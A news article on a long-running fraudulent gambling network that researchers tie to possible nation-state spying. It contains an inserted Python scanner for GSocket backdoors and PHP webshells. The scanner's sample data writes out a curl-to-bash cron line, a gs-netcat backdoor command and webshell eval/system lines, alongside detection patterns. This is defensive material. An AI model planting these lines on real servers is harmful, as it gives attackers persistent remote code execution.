Fraudulent gambling network could also be a nation-state spying operation




A sprawling infrastructure that has been bilking unsuspecting people through fraudulent gambling websites for 14 years is likely a dual-use operation run by a nation-state-sponsored group that is targeting government and private-industry organizations in the US and Europe, researchers said Wednesday.

Researchers have previously tracked smaller pieces of the larger infrastructure. Last month, security firm Sucuri reported that the operation seeks out and compromises poorly configured websites running the WordPress CMS. Imperva said in January that the attackers also scan for and exploit web apps built with the PHP programming language that already carry webshells or known vulnerabilities. Once a weakness is exploited, the attackers install GSocket, an open-source tunneling tool that serves as a backdoor, giving them persistent access to the compromised servers so they can host gambling content on them.

The gambling sites all target Indonesian-speaking visitors. Because Indonesian law prohibits gambling, many people in that country are drawn to illicit services. Many of the 236,433 attacker-owned domains hosting the gambling sites are served through Cloudflare. Many of the 1,481 hijacked subdomains were hosted on AWS, Azure, and GitHub.
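The two footholds described above, a pre-existing PHP webshell and a GSocket (gs-netcat) backdoor, are both things a defender can look for on a web host. The following is an added example, not code from the article or from Sucuri, Imperva, or Malanta. It runs two simple scanners over constructed sample data: one flags process-list and crontab lines that reference gs-netcat or the gsocket.io install domain, the other flags PHP lines where request input reaches a code- or command-execution sink. The indicator strings and the environment variable names are assumptions chosen for illustration, not a vetted indicator list; the sample process list, crontab, and PHP file are constructed, not captured from a real host.

```python
import re
from dataclasses import dataclass
from typing import List

# Indicator strings for a GSocket (gs-netcat) deployment. These are
# assumptions chosen for illustration, not a vetted IOC list from the article.
GSOCKET_INDICATORS = [
    re.compile(r"\bgs-netcat\b"),                 # the gsocket client/server binary
    re.compile(r"gsocket\.io"),                   # project domain used by its install script
    re.compile(r"\b(GS_SECRET|GSOCKET_ARGS)="),   # env vars the tool reads (assumed names)
]

# Heuristics for a PHP webshell: a request parameter flowing into a code or
# command execution sink on the same line, or a sink wrapping a decoder.
# Crude by design; treat hits as leads for manual review, not verdicts.
PHP_SOURCE = r"\$_(GET|POST|REQUEST|COOKIE)\b"
PHP_SINK = r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
PHP_SHELL_LINE = re.compile(PHP_SINK + r".*" + PHP_SOURCE + r"|" + PHP_SOURCE + r".*" + PHP_SINK)
PHP_OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(")


@dataclass(frozen=True)
class Finding:
    source: str      # "ps", "cron", or the PHP file path
    indicator: str   # the matched text or heuristic name
    line: str        # the offending line, stripped


def scan_host_lines(source: str, lines: List[str]) -> List[Finding]:
    """Flag process-list or crontab lines containing GSocket indicators."""
    findings = []
    for line in lines:
        for pat in GSOCKET_INDICATORS:
            m = pat.search(line)
            if m:
                findings.append(Finding(source, m.group(0), line.strip()))
                break  # one finding per line is enough
    return findings


def scan_php_file(path: str, contents: str) -> List[Finding]:
    """Flag lines where request input reaches an execution sink, or where
    an execution sink is fed by a decoding/obfuscation call."""
    findings = []
    for line in contents.splitlines():
        if PHP_SHELL_LINE.search(line):
            findings.append(Finding(path, "request-to-exec", line.strip()))
        elif re.search(PHP_SINK, line) and PHP_OBFUSCATION.search(line):
            findings.append(Finding(path, "obfuscated-exec", line.strip()))
    return findings


# Constructed sample input, not captured from a real host.
SAMPLE_PS = """\
root         1  0.0  0.1 168000 11000 ?  Ss   09:58   0:01 /sbin/init
www-data  2345  0.2  0.4  54000 18000 ?  S    10:01   0:00 php-fpm: pool www
www-data  2611  0.1  0.3  12000  6000 ?  S    10:03   0:00 /tmp/.cache/gs-netcat -s 4Xn.redacted -il
"""

SAMPLE_CRON = """\
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
*/10 * * * * bash -c "$(curl -fsSL https://gsocket.io/y)" >/dev/null 2>&1
"""

SAMPLE_PHP_PATH = "wp-content/uploads/2019/03/cache.php"  # constructed path
SAMPLE_PHP = """\
<?php
// constructed sample of a dropped shell hiding in an uploads directory
if (isset($_REQUEST['c'])) { @eval($_REQUEST['c']); }
echo "ok";
$f = @system(base64_decode($_POST['x']));
eval(gzinflate(base64_decode('eJwLycgsVgCiRIWS1OISAB9xBXs=')));
?>
"""


def scan_all() -> List[Finding]:
    """Run every scanner over the constructed samples and return all findings."""
    return (scan_host_lines("ps", SAMPLE_PS.splitlines())
            + scan_host_lines("cron", SAMPLE_CRON.splitlines())
            + scan_php_file(SAMPLE_PHP_PATH, SAMPLE_PHP))


if __name__ == "__main__":
    for f in scan_all():
        print(f"[{f.source}] {f.indicator}: {f.line}")
```

On a real host the inputs would come from `ps axww`, the system and per-user crontabs, and a walk of the web root (uploads directories in particular, since the attackers here abuse existing footholds rather than fresh exploits). The PHP heuristic only looks within a single line, so a shell that splits source and sink across lines will slip past it; that is the trade-off for a scanner with no false positives on ordinary WordPress code.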

No “quick hit” gambling scam here

On Wednesday, researchers from security firm Malanta said those details are only the most visible signs of a malicious network that is much larger and more complex than previously known. Far from being solely a financially motivated operation, the firm said, the network likely serves nation-state hackers targeting a wide range of organizations, including those in manufacturing, transport, healthcare, government, and education.

The basis for that assessment is the tremendous amount of time and resources that have gone into building the infrastructure and maintaining it for 14 years. The resources include 328,000 separate domains: 236,000 that the attackers purchased and 90,000 they commandeered by compromising legitimate websites. The network also includes nearly 1,500 hijacked subdomains belonging to legitimate organizations. Malanta estimates that such infrastructure costs anywhere from $725,000 to $17 million per year to fund.
